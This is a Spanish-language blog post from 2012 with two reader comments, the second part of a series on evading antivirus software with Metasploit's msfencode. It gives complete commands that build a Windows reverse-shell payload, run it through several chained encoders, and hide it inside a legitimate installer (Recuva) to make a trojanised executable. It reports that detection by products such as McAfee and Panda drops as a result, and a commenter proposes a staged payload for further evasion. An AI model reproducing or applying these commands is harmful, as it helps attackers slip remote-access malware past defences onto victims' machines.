viernes, 3 de agosto de 2012

Evadiendo antivirus con metasploit - Parte 2

  En la anterior entrada empezamos a conocer algunas de las posibilidades de msfencode a la hora de eludir antivirus. En este post se mostrarán las posibilidades más avanzadas de esta herramienta.

  En la anterior entrada aplicábamos un algoritmo de codificación para eludir antivirus, ahora lo que haremos será aplicar varios algoritmos encadenados sobre el mismo payload.
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.37 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/alpha_upper -c 7 -t raw | msfencode -e x86/shikata_ga_nai -c 7 -t raw | msfencode -e x86/countdown -c 7 -t exe -o multipay.exe
  Vemos que la forma de aplicar el cifrado múltiple es concadenando los diversos algoritmos mediante tuberías (pipes).
  También aparece un parámetro no comentado hasta ahora, es la opción -c que nos permite aplicar diversas pasadas de un algoritmo sobre el payload objetivo.
 Después al subir el payload a virustotal veremos que el indice de detecciones no ha variado respecto al realizado en el post anterior, aunque, si vemos la lista de antivirus que detectan nuestro payload hay algunos cambios, como por ejemplo, en este caso se elude el AV McAfee que en anteriores ocasiones nos detectaba.

 La última opción que veremos es a la vez la mas potente, y es que msfencode nos permite "mezclar" nuestro payload con otro ejecutable de Windows obteniendo interesantes resultados. Para el ejemplo utilizaremos el programa Recuva (he usado este por usar uno cualquiera, no tiene ningún motivo especial su uso ;) ):
msfpayload windows/shell_reverse_tcp LHOST=192.168.1.37 LPORT=31337 R | msfencode -t exe -x /root/Desktop/rcsetup143.exe -e x86/shikata_ga_nai -c 10 -o payX.exe
 El parámetro nuevo que vemos es -x al que le sigue la ruta del ejecutable al que "agregaremos" nuestro payload.
 Al subirlo a virustotal veremos que el indice de detección ha bajado considerablemente, y ahora AV conocidos como Panda no detectan el payload.


  Con esta herramienta vemos lo relativamente fácil que es eludir los antivirus, y que con la ayuda de virustotal es posible realizar las pruebas que necesitemos sin tener ningún AV instalado.

Nos leemos en breve,


5 0verl0ad Labs: Evadiendo antivirus con metasploit - Parte 2   En la anterior entrada empezamos a conocer algunas de las posibilidades de msfencode a la hora de eludir antivirus. En este post se most...

2 comentarios:

swik dijo...

Está bueno el post. Aquí te pongo otro pequeño "método" por si no lo sabías :P

Consiste en reemplazar el windows/shell_reverse_tcp por windows/shel/reverse_tcp. Mientras que el primero contiene todo el código para establecer la conexión ejecutar ya los comandos meterpreter, el segundo sólo contiene la parte del código para establecer la conexión y descarga el resto una vez ejecutado y desde el equipo atacante por lo que no contiene la parte de código que los avs buscan al contrario que el 1º

Aetsu Alpha dijo...

interesante swik, no conocía ese método. Cuando tenga tiempo lo probaré.

Garcias.

< >